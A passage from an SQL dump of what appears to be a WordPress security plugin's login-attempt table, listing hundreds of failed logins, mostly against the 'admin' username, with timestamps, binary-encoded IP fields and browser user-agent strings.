Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3514,5960,1629300904.078711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3515,5961,1629301108.371757,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(3516,5962,1629301274.439490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3517,5963,1629301686.954686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3518,5965,1629302084.749409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3519,5966,1629302433.894729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ѓ<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3520,5969,1629303265.890858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3521,5970,1629303399.729137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3522,5971,1629303645.217936,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3523,5972,1629304063.140703,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3524,5973,1629304157.728762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(3525,5974,1629304451.153185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3526,5975,1629304834.778213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3527,5976,1629305216.401409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3528,5977,1629305542.174233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3529,5978,1629305694.685790,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%a��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(3530,5979,1629306458.866565,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3531,5980,1629307226.603018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M��)','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(3532,5980,1629307226.680159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M��)','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(3533,5983,1629309509.222339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�w','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(3534,5989,1629316410.706461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(3535,5990,1629317181.151682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(3536,5992,1629318721.847461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(3537,5993,1629319490.118453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(3538,6000,1629327131.802607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�v','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(3539,6002,1629329483.676368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�A*','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(3540,6003,1629330272.393364,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(3541,6009,1629335100.890215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(3542,6010,1629335911.461585,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(3543,6015,1629341623.071512,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(3544,6019,1629345542.702389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(3545,6021,1629346302.195135,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(3546,6023,1629348550.538549,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"W#�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(3547,6024,1629349271.659371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(3548,6026,1629350721.316052,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����g$','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(3549,6030,1629352180.208762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(3550,6037,1629357370.489274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3551,6038,1629358082.940264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3552,6039,1629358113.018112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;Rz','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(3553,6041,1629358594.166683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3554,6042,1629358811.852919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3555,6043,1629358860.109363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(3556,6044,1629359063.736180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3557,6045,1629359340.348124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3558,6046,1629359449.504342,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3559,6047,1629359573.479917,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3560,6048,1629359609.196178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���75�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(3561,6049,1629359830.522685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3562,6050,1629360096.429293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3563,6051,1629360359.175898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3564,6052,1629360361.502044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����;I','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(3565,6053,1629360623.839150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3566,6054,1629360853.655116,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3567,6055,1629361118.132046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��F$R','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(3568,6056,1629361144.342618,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3569,6056,1629361144.398245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3570,6057,1629361395.896866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3571,6058,1629361624.394171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3572,6059,1629361663.010988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3573,6060,1629361907.122505,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3574,6061,1629362165.669095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3575,6062,1629362422.251471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3576,6062,1629362422.318051,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3577,6063,1629362643.121812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(3578,6064,1629362692.072204,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3579,6065,1629362960.666327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3580,6066,1629363229.315185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3581,6067,1629363493.881973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3582,6068,1629363760.361499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3583,6069,1629363761.816782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3584,6070,1629364045.976568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3585,6071,1629364190.432214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(3586,6072,1629364317.958890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3587,6073,1629364594.780678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3588,6074,1629364838.815266,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3589,6075,1629364967.506236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(3590,6076,1629365135.097137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gPR!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3591,6077,1629365408.705621,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3592,6078,1629365692.506369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3593,6079,1629365757.951495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(3594,6080,1629365922.269162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3595,6081,1629365965.955677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3596,6082,1629366250.674980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3597,6084,1629366559.959252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(3598,6085,1629366804.568244,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3599,6086,1629367100.379968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3600,6087,1629367410.019122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gmш','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3601,6088,1629367411.211749,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(3602,6089,1629367682.970712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3603,6090,1629368012.341718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3604,6093,1629368574.668339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3605,6094,1629369144.197320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(3606,6095,1629369156.745921,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3607,6097,1629369742.497877,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3608,6098,1629369975.692342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(3609,6101,1629370412.690487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\\\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3610,6103,1629372654.456100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3611,6108,1629383716.057746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3QQ\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3612,6118,1629401441.987580,1,'loginFailInvalidUsername','org',0,'\0\0\0\0\0\0\0\0\0\0��R��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3613,6121,1629405271.857344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3614,6122,1629405707.190664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gљ ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3615,6123,1629405718.709294,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��� @/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3616,6124,1629406202.755593,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3617,6125,1629406715.433934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3618,6126,1629407247.272561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3619,6129,1629408927.835590,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3620,6130,1629409498.636385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3621,6131,1629409793.358906,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3622,6132,1629410127.404499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3623,6133,1629410744.542821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3624,6134,1629411668.307732,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��4�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3625,6135,1629412017.229256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3626,6138,1629413964.828976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3627,6139,1629414628.462341,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3628,6139,1629414628.476167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3629,6140,1629415308.643716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3630,6142,1629416630.648215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3631,6144,1629417317.079329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3632,6145,1629417754.588079,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����\\\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3633,6147,1629418715.241093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3634,6148,1629419420.183205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3635,6153,1629422356.407459,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3636,6155,1629423068.929701,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sZ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3637,6158,1629425176.151949,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e \Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3638,6161,1629426950.637683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 